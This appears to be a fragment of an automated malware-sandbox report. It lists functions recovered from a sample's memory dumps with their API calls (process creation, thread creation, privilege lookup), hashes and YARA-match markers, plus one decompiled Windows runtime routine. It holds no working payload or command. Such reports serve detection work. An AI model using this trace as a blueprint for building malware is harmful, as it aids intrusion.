                                                                    • Instruction Fuzzy Hash: FDE04FB12002086BDB14DF59CC45EA777ACEF88750F014559FE085B241CA30F910CAF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004E7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004E72BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004E72DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 67bad0e5d4a92adc6d33317a1789ea242d46e63bd7c884a2fd5f29a5abb33580
                                                                    • Instruction ID: d0a3fb9ddea13750a37593dbf261b9ffdefa88ee56227a73d2b4cf11a9e73fcf
                                                                    • Opcode Fuzzy Hash: 67bad0e5d4a92adc6d33317a1789ea242d46e63bd7c884a2fd5f29a5abb33580
                                                                    • Instruction Fuzzy Hash: E801F771A8022C77E720A6968C03FFF772C9B00B55F14405AFF04BA1C1E6986D0687F9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004E723E, Relevance: 3.0, APIs: 2, Instructions: 44threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004E72BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004E72DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: a10f3065cf09a362b7cbf6157a58c3b00d03a673c6f2732cce4b20ad422863ec
                                                                    • Instruction ID: a470ab8c86a40853ec3851c8c449ab273bcd66f9f8ff997a3ba611c7e893bb7f
                                                                    • Opcode Fuzzy Hash: a10f3065cf09a362b7cbf6157a58c3b00d03a673c6f2732cce4b20ad422863ec
                                                                    • Instruction Fuzzy Hash: 6CF05073A4025872EB2075A26C03FFE734C9B40B26F19009FFF04EA2C1E6989D0582E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8503, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004F8594
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: fd9f252da74dfd095845ae86bf8532d2a83a4a2bdad2df195c49063dd180532d
                                                                    • Instruction ID: c24efd1c39b1d244da74debabf50958f7116167b897fc4d2ce28c12d358fdc63
                                                                    • Opcode Fuzzy Hash: fd9f252da74dfd095845ae86bf8532d2a83a4a2bdad2df195c49063dd180532d
                                                                    • Instruction Fuzzy Hash: 6BF0AFB62045496FCB10DFA8DC80DEB77E9EF89310B14864DFA9D9B241C638E8118BB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004F8594
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: c8515e46a1689a914e83c2d5931090a16174536fdc9659ac953dc7a7f0545bd5
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: E7015FB2214108ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F853E, Relevance: 1.5, APIs: 1, Instructions: 40processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004F8594
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 747c6920196a3329b11e4743bebb2c27fcb4d7c4e0a45acb70373eaaf283542d
                                                                    • Instruction ID: 231bad4439c58d4907e4d05c112de546f266d918b4cef99f8765df8f0f9e24de
                                                                    • Opcode Fuzzy Hash: 747c6920196a3329b11e4743bebb2c27fcb4d7c4e0a45acb70373eaaf283542d
                                                                    • Instruction Fuzzy Hash: DD01FDB2204148AFCB04DF88DC80DEB37ADAF8C314F258258FA5997241CA30E951CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,004ECCD0,?,?), ref: 004F704C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                                                                    • Instruction ID: 1e7f8b103fdbfa8a90f618e480edf2ef55049436948e69a6af48ed9e8e20daeb
                                                                    • Opcode Fuzzy Hash: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                                                                    • Instruction Fuzzy Hash: 2FE092333903083AE33065999C03FA7B39CCB81B35F54002AFB0DEB2C1D999F80142A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F700A, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,004ECCD0,?,?), ref: 004F704C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 01e5cbfe8932c03599148bff890faa19f501590655b40671bac04c4ddf626ae2
                                                                    • Instruction ID: b2cbc7cdd213fdfdb43eb0c3990790184889b87a84b87de4338d9f0ea0faaec7
                                                                    • Opcode Fuzzy Hash: 01e5cbfe8932c03599148bff890faa19f501590655b40671bac04c4ddf626ae2
                                                                    • Instruction Fuzzy Hash: 68F09B326806143AE33055698C03FF777699F95B14F15011AF749AB6C1DAA9B8024698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(004F3516,?,004F3C8F,004F3C8F,?,004F3516,?,?,?,?,?,00000000,00000000,?), ref: 004F84BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: b147eeb7065b9d510c0b7f6c619e718661a4857a3fbc641a2d1349af4098866a
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: 7AE046B1200208ABDB14EF99CC41EA777ACEF88754F118559FE085B282CA30F910CBF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,004ECFA2,004ECFA2,?,00000000,?,?), ref: 004F8660
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 8e92e33178b69cbfb6ac3164e04c089540fde88510ae34ee02ceb9bb4b91a712
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: EEE01AB12002086BDB10DF49CC85EE737ADAF89650F018559FA085B241CA34E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004ED407, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,004E7C63,?), ref: 004ED43B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 65cb8d8c814d420e14d7a53d294a17faa90f741cc1a11d2d397efa32a26c1c31
                                                                    • Instruction ID: 9893a8c2e6e0aa1a8de6f738de5f3cb5d4936053af1a7a1380719bea00f59cf4
                                                                    • Opcode Fuzzy Hash: 65cb8d8c814d420e14d7a53d294a17faa90f741cc1a11d2d397efa32a26c1c31
                                                                    • Instruction Fuzzy Hash: 49D02EA0AB83852AFB10BFB41E03F233E884B22744F694999E58CEB1E3D80CC0040239
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004ED410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,004E7C63,?), ref: 004ED43B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: f2bdd922570f23c717db7bffbef37aac28e4a0b603647586e8dcbcbd3b5911e7
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: 8AD05E617503083AE610BAA99C03F2632885B54B05F494064FA49963C3D964E5004565
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0497967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 54b48644becdcace7c97a5573d3c660510214bb9b0befc4b4908f77bc18ec3fb
                                                                    • Instruction ID: 45cbbd8cdc4154985eb99d197bfe7efa41c23dea5035c6419c830a91eb200ba4
                                                                    • Opcode Fuzzy Hash: 54b48644becdcace7c97a5573d3c660510214bb9b0befc4b4908f77bc18ec3fb
                                                                    • Instruction Fuzzy Hash: 9FB09BB19015C5C5F711E7644608F177944B7E0745F16C175D1020645A4778D091F6B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 049CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E049CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0497CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E049C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E049C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                    0x049cfdda
                                                                    0x049cfde2
                                                                    0x049cfde5
                                                                    0x049cfdec
                                                                    0x049cfdfa
                                                                    0x049cfdff
                                                                    0x049cfe0a
                                                                    0x049cfe0f
                                                                    0x049cfe17
                                                                    0x049cfe1e
                                                                    0x049cfe19
                                                                    0x049cfe19
                                                                    0x049cfe19
                                                                    0x049cfe20
                                                                    0x049cfe21
                                                                    0x049cfe22
                                                                    0x049cfe25
                                                                    0x049cfe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049CFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049CFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049CFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.473619457.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                    • Associated: 00000007.00000002.473919923.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: d177afc2ad6273675612ad6c81c8d71c0e5b938fd5cef03f84566c7ed67ade56
                                                                    • Instruction ID: 9df20864ade6307189b04fa6c74f25b6f7b195bbb4e3e1ad6c1024d0edb4acef
                                                                    • Opcode Fuzzy Hash: d177afc2ad6273675612ad6c81c8d71c0e5b938fd5cef03f84566c7ed67ade56
                                                                    • Instruction Fuzzy Hash: 1DF0FC32240111BFE6201A45DC05F237B5BDBC4730F154368F614561D1D962F860D7F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%